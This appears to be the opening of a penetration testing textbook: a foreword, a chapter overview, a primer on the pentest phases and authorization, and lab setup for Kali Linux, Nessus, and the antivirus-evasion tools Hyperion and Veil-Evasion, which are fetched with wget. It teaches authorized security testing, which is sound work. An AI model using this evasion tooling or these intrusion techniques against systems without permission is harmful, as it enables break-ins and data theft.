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FOREWORD

I met Georgia Weidman at a conference almost two
years ago. Intrigued by what she was doing in the
mobile device security field, I started following her
work. At nearly every conference I've attended since
then, I've run into Georgia and found her passion-
ately sharing knowledge and ideas about mobile
device security and her Smartphone Pentesting
Framework.

In fact, mobile device security is only one of the things Georgia does.
Georgia performs penetration tests for a living; travels the world to deliver
training on pentesting, the Metasploit Framework, and mobile device secu-
rity; and presents novel and innovative ideas on how to assess the security of
mobile devices at conferences.

Georgia spares no effort in diving deeper into more advanced top-
ics and working hard to learn new things. She is a former student of my
(rather challenging) Exploit Development Bootcamp, and I can attest to
the fact that she did very well throughout the entire class. Georgia is a true
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Foreword

hacker—always willing to share her findings and knowledge with our great
infosec community—and when she asked me to write the foreword to this
book, I felt very privileged and honored.

As a chief information security officer, a significant part of my job
revolves around designing, implementing, and managing an information
security program. Risk management is a very important aspect of the pro-
gram because it allows a company to measure and better understand its
current position in terms of risk. It also allows a company to define priori-
ties and implement measures to decrease risk to an acceptable level, based
on the company’s core business activities, its mission and vision, and legal
requirements.

Identifying all critical business processes, data, and data flows inside
a company is one of the first steps in risk management. This step includes
compiling a detailed inventory of all IT systems (equipment, networks,
applications, interfaces, and so on) that support the company’s critical busi-
ness processes and data from an IT perspective. The task is time consuming
and it’s very easy to forget about certain systems that at first don’t seem to
be directly related to supporting critical business processes and data, but
that are nonetheless critical because other systems depend on them. This
inventory is fundamentally important and is the perfect starting point for a
risk-assessment exercise.

One of the goals of an information-security program is to define what
is necessary to preserve the desired level of confidentiality, integrity, and
availability of a company’s I'T systems and data. Business process owners
should be able to define their goals, and our job as information-security
professionals is to implement measures to make sure we meet these goals
and to test how effective these measures are.

There are a few ways to determine the actual risk to the confidentiality,
integrity, and availability of a company’s systems. One way is to perform a
technical assessment to see how easy it would be for an adversary to under-
mine the desired level of confidentiality, break the integrity of systems, and
interfere with the availability of systems, either by attacking them directly
or by attacking the users with access to these systems.

That’s where a penetration tester (pentester, ethical hacker, or what-
ever you want to call it) comes into play. By combining knowledge of how
systems are designed, built, and maintained with a skillset that includes
finding creative ways around defenses, a good pentester is instrumental in
identitying and demonstrating the strength of a company’s information-
security posture.

If you would like to become a penetration tester or if you are a systems/
network administrator who wants to know more about how to test the
security of your systems, this book is perfect for you. You'll learn some of
the more technical phases of a penetration test, beginning with the initial
information-gathering process. You'll continue with explanations of how to
exploit vulnerable networks and applications as you delve deeper into the
network in order to determine how much damage could be done.

This book is unique because it’s not just a compilation of tools with
a discussion of the available options. It takes a very practical approach,



designed around a lab—a set of virtual machines with vulnerable applica-
tions—so you can safely try various pentesting techniques using publicly
available free tools.

Each chapter starts with an introduction and contains one or more
hands-on exercises that will allow you to better understand how vulner-
abilities can be discovered and exploited. You’ll find helpful tips and tricks
from an experienced professional pentester, real-life scenarios, proven tech-
niques, and anecdotes from actual penetration tests.

Entire books can be written (and have been) on the topics covered in
each chapter in this book, and this book doesn’t claim to be the Wikipedia
of pentesting. That said, it will certainly provide you with more than a first
peek into the large variety of attacks that can be performed to assess a tar-
get’s security posture. Thanks to its guided, hands-on approach, you’ll learn
how to use the Metasploit Framework to exploit vulnerable applications and
use a single hole in a system’s defenses to bypass all perimeter protections,
dive deeper into the network, and exfiltrate data from the target systems.
You'll learn how to bypass antivirus programs and perform efficient social-
engineering attacks using tools like the Social-Engineer Toolkit. You'll see
how easy it would be to break into a corporate Wi-Fi network, and how to use
Georgia’s Smartphone Pentest Framework to assess how damaging a com-
pany’s bring your own device policy (or lack thereof) could be. Each chap-
ter is designed to trigger your interest in pentesting and to provide you with
first-hand insight into what goes on inside a pentester’s mind.

I hope this book will spark your creativity and desire to dive deeper into
certain areas; to work hard and learn more; and to do your own research
and share your knowledge with the community. As technology develops,
environments change, and companies increasingly rely on technology
to support their core business activities, the need for smart pentesters
will increase. You are the future of this community and the information-
security industry.

Good luck taking your first steps into the exciting world of pentesting.
I'm sure you will enjoy this book!

Peter “corelancOd3r” Van Eeckhoutte
Founder of Corelan Team
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INTRODUCTION

I decided to write this book because it was the sort
of book I wish I had had when I was starting out in
information security. Though there are certainly
more informative websites out there than when I
first started, I still find it’s difficult for a beginner to

know what to read first and where to get the expected prerequisite skills.
Likewise, there are a lot of books on the market—several great ones on
advanced topics, which require some background knowledge, and many
good books aimed at beginners, which cover a significant amount of theory.
But I haven’t found anything that says everything I want to say to the aspiring
pentester who emails me looking for a place to start in information security.

In my teaching career I've always found that my favorite course to
teach is Introduction to Pentesting. The students always have a thirst for
knowledge that is lots of fun to be around. Thus, when I was approached
by No Starch Press to write a book, this was the book I proposed. When I
announced it, many people assumed I was writing a mobile security book,
but while I considered that, I thought an introduction to pentesting would
make the biggest impact on the audience I most wanted to reach.
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A Note of Thanks

A book like this would not be possible without many years of dedicated
work on the part of the information security community. The tools and
techniques discussed throughout this book are some of the ones my col-
leagues and I use regularly on engagements, and they’ve been developed
through the combined efforts of pentesters and other security experts all
over the world. I've contributed to some of these open source projects (such
as Mona.py, which we’ll use in the exploit development chapters), and I hope
this book will inspire you to do the same.

I want to take this opportunity to thank Offensive Security for creating
and maintaining the Kali Linux pentesting distribution used widely in the
field and throughout this book. A huge amount of credit also goes to the
core developers of the Metasploit Framework, as well as its numerous com-
munity contributors. Thanks too to all the pentesters and researchers who
have shared their knowledge, discoveries, and techniques with the com-
munity so that we can use them to assess the security posture of our clients
more effectively, and so that teachers like me can use them with our students.

Thanks as well to the creators of the great books, blog posts, courses,
and so on that have helped me achieve my goal of becoming a professional
pentester. I now hope to share the knowledge I've gained with other aspir-
ing pentesters.

You'll find a list of additional resources (including courses and blogs)
at the end of this book. These are some of the resources that I have found
helpful on my own journey in infosec, and I encourage you to use them to
learn more about the many penetration testing topics covered in this book.
I hope you enjoy your journey as much as I have.

About This Book

Introduction

To work through this book, you will need to know how to install software
on your computer. That’s it. You don’t need to be a Linux expert or know
the nitty-gritty of how networking protocols work. When you encounter

a topic that is not familiar to you, I encourage you to do some outside
research beyond my explanations if you need to—but we will walk step-by-
step through all the tools and techniques that may be new to you, starting
with the Linux command line. When I started in information security, the
closest thing I'd ever done to hacking was making the Windows XP pre-SP2
Start menu say Georgia instead of Start. And I was pretty proud of myself at
the time.

And then I went to the Collegiate Cyber Defense Competition and all
the Red Team members were using the command line at rapid speed and
making pop-up windows appear on my desktop from across a crowded
room. All I knew was that I wanted to be like them. There was a lot of hard
work between then and now, and there will be much more hard work as I
endeavor to reach the highest level of information security. I only hope that
with this book I can inspire more people to follow the same path.



Part I: The Basics

In Chapter 0, we start out with some basic definitions of the phases of pene-
tration testing. In Chapter 1, we build our small practice laboratory, which we
will use to work through the exercises in this book. With many books, it’s pos-
sible to just download a few programs onto your existing platform, but to sim-
ulate a penetration test, our approach is a bit more involved. I recommend
that you take the time to set up your lab and work through the hands-on
examples with me. Though this book can serve as a reference and reminder
in the field, I believe it is best to first practice your pentesting skills at home.

In Chapter 2, we start with the basics of using Kali Linux and Linux
operating systems in general. Next, Chapter 3 covers the basics of program-
ming. Some readers may already have a working knowledge in these areas
and can skip past them. When I first started out, I had some programming
experience in C and Java, but I didn’t have a background in scripting, and
I had practically no background in Linux—a skillset that was assumed by
most of the hacking tutorials I encountered. Thus, I have provided a primer
here. If you are new to these areas, please do continue your studies outside
of this book. Linux-based operating systems are becoming more and more
prevalent as the platforms for mobile devices and web services, so skills in
this area will benefit you even if you don’t pursue a career in information
security. Likewise, knowing how to script your common tasks can only make
your life easier, regardless of your career.

We look at the basics of using the Metasploit Framework, a tool we will
leverage throughout this book, in Chapter 4. Though we will also learn to
perform many tasks without Metasploit, it is a go-to tool for many pentest-
ers in the field and is constantly evolving to include the latest threats and
techniques.

Part ll: Assessments

Next we start working through a simulated penetration test. In Chapter 5,
we begin by gathering data about our target—both by searching freely
available information online and by engaging our target systems. We then
start searching for vulnerabilities using a combination of querying the sys-
tems and research in Chapter 6. In Chapter 7, we look at techniques to cap-
ture traffic that might include sensitive data.

Part IlI: Attacks

Next, in Chapter 8, we look at exploiting the vulnerabilities we found on
the network with a variety of tools and techniques, including Metasploit and
purely manual exploitation. We then look at methods for attacking what is
often the weakest link in a network’s security—password management—in
Chapter 9.

We next look at some more advanced exploitation techniques. Not
all vulnerabilities are in a service listening on the network. Web browsers,
PDF readers, Java, Microsoft Office—they all have been subject to security
issues. As clients work harder to secure their networks, attacking client-
side software may be the key to getting a foothold in the network. We look

Introduction Xxvii
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Introduction

at leveraging client-side attacks in Chapter 10. In Chapter 11, we combine
client-side attacks with a look at social engineering, or attacking the human
element—the part of the environment that cannot be patched. After all, with
client-side attacks, the software in question must open a malicious file of
some sort, so we must convince the user to help us out. In Chapter 12, we
look at some methods of bypassing antivirus software, as many of your cli-
ents will deploy it. If you have high enough privileges on a system, you may
be able to just turn antivirus programs off, but a better solution is to breeze
right past antivirus programs undetected, which can be done even if you
are saving malicious programs to the hard drive.

In Chapter 13, we pick up with the next phase of our penetration test,
post exploitation. Some say the pentest truly begins after exploitation. This
is where you leverage your access to find additional systems to attack, sensi-
tive information to steal, and so on. If you continue your penetration test-
ing studies, you will spend a good deal of time working on the latest and
greatest post-exploitation techniques.

After post exploitation, we look at a few additional skills you will need
to be a well-rounded penetration tester. We will take a brief look at assess-
ing the security of custom web applications in Chapter 14. Everyone has a
website these days, so it’s a good skill to cultivate. Next we will look at assess-
ing the security of wireless networks in Chapter 15, looking at methods for
cracking commonly deployed cryptographic systems.

Part IV: Exploit Development

Chapters 16, 17, 18, and 19 discuss the basics of writing your own exploits.
We will look at finding vulnerabilities, exploiting them with common tech-
niques, and even writing our own Metasploit module. Up until these chap-
ters, we have relied on tools and publicly available exploits for a lot of our
exercises. As you advance in infosec, you may want to find new bugs (called
zero-days) and report them to vendors for a possible bounty. You can then
release a public exploit and/or Metasploit module to help other pentesters
test their customers’ environments for the issue you discovered.

Part V: Mobile Hacking

Finally, in Chapter 20, we close with a relatively new area of penetration test-
ing—assessing the security of mobile devices. We look at my own tool, the
Smartphone Pentest Framework. Perhaps after mastering the skills in this
book, you will endeavor to develop and release a security tool of your own.

Of course, this book doesn’t cover every single facet of information
security, nor every tool or technique. If it did, this book would have been
several times longer and come out a good deal later, and I need to get back
to my research. So here you have it: a hands-on introduction to hacking. It is
an honor to be with you on this important step on your journey into informa-
tion security. I hope that you learn a lot from this book and that it inspires
you to continue your studies and become an active member of this exciting
and rapidly developing field.

vww allitebooks.conl
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PENETRATION TESTING PRIMER

Penetration testing, or pentesting (not to be confused
with testing ballpoint or fountain pens), involves sim-
ulating real attacks to assess the risk associated with
potential security breaches. On a pentest (as opposed
to a vulnerability assessment), the testers not only dis-
cover vulnerabilities that could be used by attackers
but also exploit vulnerabilities, where possible, to
assess what attackers might gain after a successful
exploitation.

From time to time, a news story breaks about a major company being
hit by a cyberattack. More often than not, the attackers didn’t use the latest
and greatest zero-day (a vulnerability unpatched by the software publishers).
Major companies with sizable security budgets fall victim to SQL injec-
tion vulnerabilities on their websites, social-engineering attacks against
employees, weak passwords on Internet-facing services, and so on. In other
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words, companies are losing proprietary data and exposing their clients’
personal details through security holes that could have been fixed. On a
penetration test, we find these issues before an attacker does, and we rec-
ommend how to fix them and avoid future vulnerabilities.

The scope of your pentests will vary from client to client, as will your
tasks. Some clients will have an excellent security posture, while others will
have vulnerabilities that could allow attackers to breach the perimeter and
gain access to internal systems.

You may also be tasked with assessing one or many custom web applica-
tions. You may perform social-engineering and client-side attacks to gain
access to a client’s internal network. Some pentests will require you to act
like an insider—a malicious employee or attacker who has already breached
the perimeter—as you perform an internal penetration test. Some clients will
request an external penetration test, in which you simulate an attack via the
Internet. And some clients may want you to assess the security of the wire-
less networks in their office. In some cases, you may even audit a client’s
physical security controls.

The Stages of the Penetration Test

Chapter O

Pentesting begins with the pre-engagement phase, which involves talking to
the client about their goals for the pentest, mapping out the scope (the
extent and parameters of the test), and so on. When the pentester and the
client agree about scope, reporting format, and other topics, the actual test-
ing begins.

In the information-gathering phase, the pentester searches for publicly
available information about the client and identifies potential ways to con-
nect to its systems. In the threat-modeling phase, the tester uses this informa-
tion to determine the value of each finding and the impact to the client if
the finding permitted an attacker to break into a system. This evaluation
allows the pentester to develop an action plan and methods of attack.

Before the pentester can start attacking systems, he or she performs a
vulnerability analysis. In this phase, the pentester attempts to discover vul-
nerabilities in the systems that can be taken advantage of in the exploitation
phase. A successful exploit might lead to a post-exploitation phase, where the
result of the exploitation is leveraged to find additional information, sensi-
tive data, access to other systems, and so on.

Finally, in the reporting phase, the pentester summarizes the findings for
both executives and technical practitioners.

For more information on pentesting, a good place to start is the Penetration Testing
Execution Standard (PTES) at http://www.pentest-standard.org/.

Pre-engagement

Before the pentest begins, pentesters perform pre-engagement interac-
tions with the client to make sure everyone is on the same page about the



penetration testing. Miscommunication between a pentester and a client
who expects a simple vulnerability scan could lead to a sticky situation
because penetration tests are much more intrusive.

The pre-engagement stage is when you should take the time to under-
stand your client’s business goals for the pentest. If this is their first pentest,
what prompted them to find a pentester? What exposures are they most
worried about? Do they have any fragile devices you need to be careful
with when testing? (I've encountered everything from windmills to medical
devices hooked up to patients on networks.)

Ask questions about your client’s business. What matters most to them?
For example, to a top online vendor, hours of downtime could mean thou-
sands of dollars of lost revenue. To a local bank, having online banking sites
go down for a few hours may annoy a few customers, but that downtime
wouldn’t be nearly as devastating as the compromise of a credit card data-
base. To an information security vendor, having their homepage plastered
with rude messages from attackers could lead to a damaged reputation that
snowballs into a major revenue loss.

Other important items to discuss and agree upon during the pre-
engagement phase of the pentest include the following:

Scope
What IP addresses or hosts are in scope, and what is not in scope? What
sorts of actions will the client allow you to perform? Are you allowed to
use exploits and potentially bring down a service, or should you limit the
assessment to merely detecting possible vulnerabilities? Does the client
understand that even a simple port scan could bring down a server or
router? Are you allowed to perform a social-engineering attack?

The testing window
The client may want you to perform tests only during specific hours or
on certain days.

Contact information
Whom should you contact if you find something serious? Does the cli-
ent expect you to contact someone 24 hours a day? Do they prefer that
you use encryption for email?

A “get out of jail free” card
Make sure you have authorization to perform a penetration test on the
target. If a target is not owned by the company (for instance, because
it’s hosted by a third party), make sure to verify that the client has
formal approval from the third party to perform the penetration test.
Regardless, make sure your contract includes a statement that limits
your liability in case something unexpected happens, and get written
permission to perform the test.

Payment terms
How and when will you be paid, and how much?

Penetration Testing Primer 3
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Finally, include a nondisclosure agreement clause in your contract.
Clients will appreciate your written commitment to keep the penetration
test and any findings confidential.

Information Gathering

Next is the information-gathering phase. During this phase, you analyze
freely available sources of information, a process known as gathering open
source intelligence (OSINT). You also begin to use tools such as port scanners
to get an idea of what systems are out there on the Internet or internal net-
work as well as what software is running. We’ll explore information gather-
ing in more detail in Chapter 5.

Threat Modeling

Based on the knowledge gained in the information-gathering phase, we
move on to threat modeling. Here we think like attackers and develop plans
of attack based on the information we’ve gathered. For example, if the client
develops proprietary software, an attacker could devastate the organization
by gaining access to their internal development systems, where the source
code is developed and tested, and selling the company’s trade secrets to a
competitor. Based on the data we found during information gathering, we
develop strategies to penetrate a client’s systems.

Vulnerability Analysis

Next, pentesters begin to actively discover vulnerabilities to determine how
successful their exploit strategies might be. Failed exploits can crash ser-
vices, set off intrusion-detection alerts, and otherwise ruin your chances of
successful exploitation. Often during this phase, pentesters run vulnerabil-
ity scanners, which use vulnerability databases and a series of active checks
to make a best guess about which vulnerabilities are present on a client’s sys-
tem. But though vulnerability scanners are powerful tools, they can’t fully
replace critical thinking, so we also perform manual analysis and verify
results on our own in this phase as well. We’ll explore various vulnerability-
identification tools and techniques in Chapter 6.

Exploitation

Now for the fun stuff: exploitation. Here we run exploits against the vul-
nerabilities we’ve discovered (sometimes using a tool like Metasploit) in an
attempt to access a client’s systems. As you’ll see, some vulnerabilities will be
remarkably easy to exploit, such as logging in with default passwords. We’ll
look at exploitation in Chapter 8.

Post Exploitation

Some say pentests truly begin only after exploitation, in the post-exploitation
phase. You got in, but what does that intrusion really mean to the client? If
you broke into an unpatched legacy system that isn’t part of a domain or



otherwise networked to high-value targets, and that system contains no
information of interest to an attacker, that vulnerability’s risk is significantly
lower than if you were able to exploit a domain controller or a client’s devel-
opment system.

During post exploitation, we gather information about the attacked sys-
tem, look for interesting files, attempt to elevate our privileges where neces-
sary, and so on. For example, we might dump password hashes to see if we
can reverse them or use them to access additional systems. We might also
try to use the exploited machine to attack systems not previously available
to us by pivoting into them. We’ll examine post exploitation in Chapter 13.

Reporting

The final phase of penetration testing is reporting. This is where we convey

our findings to the customer in a meaningful way. We tell them what they’re
doing correctly, where they need to improve their security posture, how you
got in, what you found, how to fix problems, and so on.

Writing a good pentest report is an art that takes practice to master.
You’ll need to convey your findings clearly to everyone from the IT staff
charged with fixing vulnerabilities to upper management who signs off on
the changes to external auditors. For instance, if a nontechnical type reads,
“And then I used MS08-067 to get a shell,” he or she might think, “You mean,
like a seashell?” A better way to communicate this thought would be to men-
tion the private data you were able to access or change. A statement like “I
was able to read your email,” will resonate with almost anyone.

The pentest report should include both an executive summary and a
technical report, as discussed in the following sections.

Executive Summary

The executive summary describes the goals of the test and offers a high-
level overview of the findings. The intended audience is the executives in
charge of the security program. Your executive summary should include
the following:

Background A description of the purpose of the test and definitions
of any terms that may be unfamiliar to executives, such as vulnerability
and countermeasure.

Overall posture An overview of the effectiveness of the test, the
issues found (such as exploiting the MS08-067 Microsoft vulnerability),
and general issues that cause vulnerabilities, such as a lack of patch
management.

Risk profile An overall rank of the organization’s security posture
compared to similar organizations with measures such as high, moder-
ate, or low. You should also include an explanation of the ranking.

General findings A general synopsis of the issues identified along
with statistics and metrics on the effectiveness of any countermeasures
deployed.

Penetration Testing Primer 5
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Recommendation summary A high-level overview of the tasks required
to remediate the issues discovered in the pentest.

Strategic road map Give the client short- and long-term goals to
improve their security posture. For example, you might tell them to
apply certain patches now to address short-term concerns, but without
a long-term plan for patch management, the client will be in the same
position after new patches have been released.

Technical Report
This section of the report offers technical details of the test. It should
include the following:

Introduction An inventory of details such as scope, contacts, and so on.

Information gathering Details of the findings in the information-
gathering phase. Of particular interest is the client’s Internet footprint.
Vulnerability assessment Details of the findings of the vulnerability-
analysis phase of the test.

Exploitation/vulnerability verification Details of the findings from
the exploitation phase of the test.

Post exploitation Details of the findings of the post-exploitation
phase of the test.

Risk/exposure A quantitative description of the risk discovered. This
section estimates the loss if the identified vulnerabilities were exploited
by an attacker.

Conclusion A final overview of the test.

Summary

Chapter O

This chapter has taken a brief look at the phases of penetration testing,
including pre-engagement, information gathering, threat modeling,
vulnerability analysis, exploitation, post exploitation, and reporting.
Familiarity with these phases will be crucial as you begin your pentesting
career, and you’ll learn more about them as you move through the book.
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SETTING UP YOUR VIRTUAL LAB

As you work through this book, you’ll get hands-on
experience using different tools and techniques for
penetration testing by working in a virtual lab run-

ning in the VMware virtualization software. I'll walk

you through setting up your lab to run multiple operating systems inside
your base operating system in order to simulate an entire network using
just one physical machine. We’ll use our lab to attack target systems
throughout this book.

Installing VMware

As the first step in setting up your virtual lab, download and install a desk-
top VMware product. VMware Player is available free for personal use for
Microsoft Windows and Linux operating systems (http://www.vmware.com/
products/player/). VMware also offers VMware Workstation (http://www
.umware.com/products/workstation/) for Windows and Linux, which includes



additional features such as the ability to take snapshots of the virtual
machine that you can revert to in case you break something. VMware
Workstation is available for free for 30 days, but after that, you will need
to buy it or switch back to using VMware Player.

Mac users can run a trial version of VMware Fusion (http://www.vmware
.com/products/fusion/) free for 30 days, and it costs only about $50 after that.
As a Mac user, I'll use VMware Fusion throughout the book, but setup
instructions are also included for VMware Player.

Download the version of VMware that matches your operating system
and architecture (32- or 64-bit). If you encounter any problems installing
VMware, you’ll find plenty of support at the VMware website.

Setting Up Kali Linux

Kali Linux is a Debian-based Linux distribution that comes with a wide
variety of preinstalled security tools that we’ll use throughout this book.
This book is written for Kali 1.0.6, the current version as of this writing.
You'll find a link to a torrent containing a copy of Kali 1.0.6 at this book’s
website (http://nostarch.com/pentesting/). As time passes, newer versions of
Kali will be released. If you would like, feel free to download the latest ver-
sion of Kali Linux from http://www.kali.org/. Keep in mind, though, that
many of the tools we’ll use in this book are in active development, so if you
use a newer version of Kali, some of the exercises may differ from the walk-
throughs in this book. If you prefer everything to work as written, I recom-
mend using the version of Kali 1.0.6 provided in the torrent (a file called
kali-linux-1.0.6-uvm-i486.7z), which is a prebuilt VMware image compressed
with 7-Zip.

You can find 7-Zip programs for Windows and Linux platforms at http://www
7-zip.org/download.html. For Mac users, I recommend Ez7z from http://ez7z
.en.softonic.com/mac/.

1. Once the 7-Zip archive is decompressed, in VMware go to File » Open
and direct it to the file Kali Linux 1.0.6 32 bit.vmx in the decompressed
Kali Linux 1.0.6 32 bit folder.

2. Once the virtual machine opens, click the Play button and, when
prompted as shown in Figure 1-1, choose I copied it.

3. As Kali Linux boots up, you will be prompted as shown in Figure 1-2.
Choose the top (default) highlighted option.

10 Chapter 1
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Figure 1-1: Opening the Kali Linux virtual machine

Figure 1-2: Booting Kali Linux

Setting Up Your Virtual Lab 11



4. Once Kali Linux boots, you will be presented with a login screen like
the one shown in Figure 1-3.

Figure 1-3: Kali login screen

5. Click Other and enter the default credentials for Kali Linux, rooi:toor, as
shown in Figure 1-4. Then click the Log In button.

Figure 1-4: logging into Kali
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6. You will be presented with a screen like the one shown in Figure 1-5.

Figure 1-5: The Kali Linux GUI

Configuring the Network for Your Virtual Machine

Because we’ll be using Kali Linux to attack our target systems over a net-

work, we need to place all our virtual machines on the same virtual network

(we will see an example of moving between networks in Chapter 13, which
covers post exploitation). VMware offers three options for virtual network
connections: bridged, NAT, and host only. You should choose the bridged
option, but here’s a bit of information about each:

e  The bridged network connects the virtual machine directly to the local
network using the same connection as the host system. As far as the
local network is concerned, our virtual machine is just another node
on the network with its own IP address.

e NAT, short for network address translation, sets up a private network on the
host machine. The private network translates outgoing traffic from the

virtual machine to the local network. On the local network, traffic from

the virtual machine will appear to come from the host machine’s IP
address.

e  The host-only network limits the virtual machine to a local private net-
work on the host. The virtual machine will be able to communicate
with other virtual machines in the host-only network as well as the host
machine itself, but it will not be able to send or receive any traffic with
the local network or the Internet.

Setting Up Your Virtual Lab



Because our target virtual machines will have multiple known security vulnerabili-
ties, use caution when attaching them to your local network because anyone else on
that network can also attack these machines. For this reason, I do not recommend work-
ing through this book on a public network where you do not trust the other users.

By default, the Kali Linux virtual machine network adapter is set to
NAT. Here’s how to change that option on both Windows and Mac OS.

VMware Player on Microsoft Windows

To change the virtual network on VMware Player for Windows, start VMware
Player and then click your Kali Linux virtual machine. Choose Edit virtual
machine settings, as shown in Figure 1-6. (If you'’re still running Kali Linux
in VMware Player, choose Player » Manage » Virtual machine settings.)

Elayervl [ R4 = F

Home

Y KaliLinux 1.0.6 64 bit

Windows XP

Kali Linux 1.0.6 64 bit

State: Powered Off
08: Debian 7 64-bit
Version: Workstation 10.0 virtual machine
RAM: 2GB

L) Flay virtual machine

ﬂ Edit virtual machine settings

Figure 1-6: Changing the VMware network adapter
On the next screen, choose Network Adapter in the Hardware tab and

choose the Bridged option in the Network connection section, as shown in
Figure 1-7.
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Figure 1-7: Changing the network adapter settings
Now click the Configure Adapters button and check the network
adapter that you're using with your host operating system. As you can see

in Figure 1-8, I've selected only the Realtek wireless adapter. Once you've
made your selection, press OK.

Figure 1-8: Selecting a network adapter

Setting Up Your Virtual Lab
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VMware Fusion on Mac 0S

To change the virtual network connection in VMware Fusion, go to Virtual
Machine » Network Adapter and change from NAT to Bridged, as shown in
Figure 1-9.

Figure 1-9: Changing the network adapter

Connecting the Virtual Machine to the Network

Kali Linux should automatically pull an IP address from the Bridged network
once you make the switch. To verify your IP address, open a Linux terminal
by clicking the terminal icon(a black rectangle with the symbols >_) at the
top left of the Kali screen (or choose Applications » Accessories » Terminal).
Then run the command ifconfig to see your network information, as shown
in Listing 1-1.

root@kali:~# ifconfig

etho Link encap:Ethernet HWaddr 00:0c:29:df:7e:4d
inet addr:192.168.20.9 Bcast:192.168.20.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fedf:7e4d/64 Scope:Link

--snip--

Listing 1-1: Networking information

The prompt root@kali:~# is the superuser (root) prompt. We will learn more about
this and the other Linux commands we use for setup in Chapter 2.



The IPv4 address for this virtual machine is 192.168.20.9, as highlighted
in bold in Listing 1-1. (The IP address for your machine will likely differ.)

Testing Your Internet Access

Now let’s make sure that Kali Linux can connect to the Internet. We’ll use
the ping network utility to see if we can reach Google. Make sure your com-
puter is connected to the Internet, open a Linux terminal, and enter the
following.

root@kali:~# ping www.google.com

If you see something like the following in response, you're online.
(We’ll learn more about the ping command in Chapter 3.)

PING www.google.com (50.0.2.221) 56(84) bytes of data.

64 bytes from cache.google.com (50.0.2.221): icmp_req=1 ttl=60 time=28.7 ms
64 bytes from cache.google.com (50.0.2.221): icmp_reg=2 ttl=60 time=28.1 ms
64 bytes from cache.google.com (50.0.2.221): icmp_req=3 ttl=60 time=27.4 ms
64 bytes from cache.google.com (50.0.2.221): icmp_req=4 ttl=60 time=29.4 ms
64 bytes from cache.google.com (50.0.2.221): icmp req=5 ttl=60 time=28.7 ms
64 bytes from cache.google.com (50.0.2.221): icmp_req=6 ttl=60 time=28.0 ms
--snip--

If you do not receive a response, make sure that you have set your net-
work adapter to Bridged, that Kali Linux has an IP address, and, of course,
that your host system currently has Internet access.

Installing Nessus

Although Kali Linux has just about every tool we’ll need, we do need to
install a few additional programs. First, we’ll install Tenable Security’s
Nessus Home vulnerability scanner. This scanner is free for home use only
(you’ll see a description of limitations on the Nessus website). Note that
Nessus is very actively developed, so the current version as well as its GUI
may have changed a bit since this book went to press.

Use the following steps to install Nessus Home from within Kali:

1. Open Applications » Internet » Iceweasel Web Browser and enter
http://www.tenable.com/products/nessus-home/ in the address bar. Complete
the Register for an Activation Code information and click Register.
(Use a real email address—you’ll need the activation code later.)

2. Once you reach the Downloads page, choose the latest version of Nessus
for the Linux Debian 32-bit platform (Nessus-5.2.5-debian6_i386.deb as of
this writing) and download it to your root directory (the default down-
load location).

3. Open a Linux terminal (click the terminal icon at the top of the Kali
screen) to open a root prompt.
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4. Enter 1s to see a list of the files in your root directory. You should see
the Nessus file that you just downloaded.

5. Enter dpkg -i followed by the name of the file you downloaded (you can
type the first letter of the filename and press TAB to use tab completion)
and press ENTER to begin the install process. Installation may take a while
as Nessus processes various plugins. Progress is shown by a line of hash
symbols (#).

Selecting previously unselected package nessus.

(Reading database ... 355024 files and directories currently installed.)
Unpacking nessus (from Nessus-5.2.5-debian6_amd64.deb) ...

Setting up nessus (5.2.5) ...

nessusd (Nessus) 5.2.5 [build N25109] for Linux

Copyright (C) 1998 - 2014 Tenable Network Security, Inc

Processing the Nessus plugins...
[ ]

6. Once you're returned to the root prompt with no errors, Nessus should
be installed, and you should see a message like this.

All plugins loaded

Fetching the newest plugins from nessus.org...

Fetching the newest updates from nessus.org...

Done. The Nessus server will start processing these plugins within a
minute

nessusd (Nessus) 5.2.5 [build N25109] for Linux

Copyright (C) 1998 - 2014 Tenable Network Security, Inc

Processing the Nessus plugins...
[ttt R |

All plugins loaded

- You can start nessusd by typing /etc/init.d/nessusd start
- Then go to https://kali:8834/ to configure your scanner

7. Now enter the following to start Nessus.

root@kali:~# /etc/init.d/nessusd start

8. Open the URL #Zttps://kali:8834/ in the Iceweasel web browser. You
should see a SSL certificate warning, similar to that in Figure 1-10.

If you access Nessus from outside the Iceweasel browser in Kali, you will need to go to
https://<ipaddressofKali>:8834 instead.
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Figure 1-10: Invalid SSL certificate warning

9. Expand I Understand the Risks and click Add Exception. Then click
Confirm Security Exception, as shown in Figure 1-11.

Figure 1-11: Confirming the security exception
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10. Click Get Started at the bottom left of the opening Nessus page and
enter a username and password on the following page. I've chosen
georgia:password for my example. If you choose something else, remember
it because we’ll use Nessus in Chapter 6. (Note that I use poor passwords
throughout this book, as will many clients you encounter. In production,
you should use much better passwords than password.)

11. At the next page, enter the activation code you received via email from
Tenable Security.

12. Once registered with Tenable Security, choose the option to download
plugins (downloading will take some time). Once Nessus processes the
plugins, it will initialize.

When Nessus finishes downloading plugins and configuring the soft-
ware, you should see the Nessus login screen, as shown in Figure 1-12. You
should be able to use the credentials for the account you created during
setup to log in.

Figure 1-12: Login screen of the Nessus web interface

To close Nessus, just close its tab in the browser. We will come back to
Nessus in Chapter 6.

Installing Additional Software

We’re not done yet. Follow these instructions to complete your Kali Linux
install.

The Ming C Compiler

We need to install a cross compiler so we can compile C code to run on
Microsoft Windows systems. The Ming compiler is included in the Kali Linux
repositories but is not installed by default. Install it with this command.

root@kali:~# apt-get install mingw32
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Hyperion

We’ll use the Hyperion encryption program to bypass antivirus software.
Hyperion is not currently included in the Kali repositories. Download
Hyperion with wget, unzip it, and compile it with the Ming cross compiler
you installed in the previous step, as shown in Listing 1-2.

root@kali:~# wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip
root@kali:~# unzip Hyperion-1.0.zip
Archive: Hyperion-1.0.zip

creating: Hyperion-1.0/

creating: Hyperion-1.0/FasmAES-1.0/
root@kali:~# i586-mingw32msvc-c++ Hyperion-1.0/Src/Cryptexr/*.cpp -o hyperion.exe
--snip--

Listing 1-2: Installing Hyperion

Veil-Evasion

Veil-Evasion is a tool that generates payload executables you can use to bypass
common antivirus solutions. Install Veil-Evasion Kali (see Listing 1-3) by first
downloading it with the command wget. Next, unzip the downloaded file
master.zip and change to the Veil-master/setup directory. Finally, enter ./setup.sh
and follow the default prompts.

root@kali:~# wget https://github.com/ChrisTruncer/Veil/archive/master.zip
--2015-11-26 09:54:10-- https://github.com/ChrisTruncer/Veil/archive/master.zip
--snip--

2015-11-26 09:54:14 (880 KB/s) - “master.zip' saved [665425]

root@kali:~# unzip master.zip
Archive: master.zip
948984fa75899dc45a1939f fbf4fcoe2edeocacs

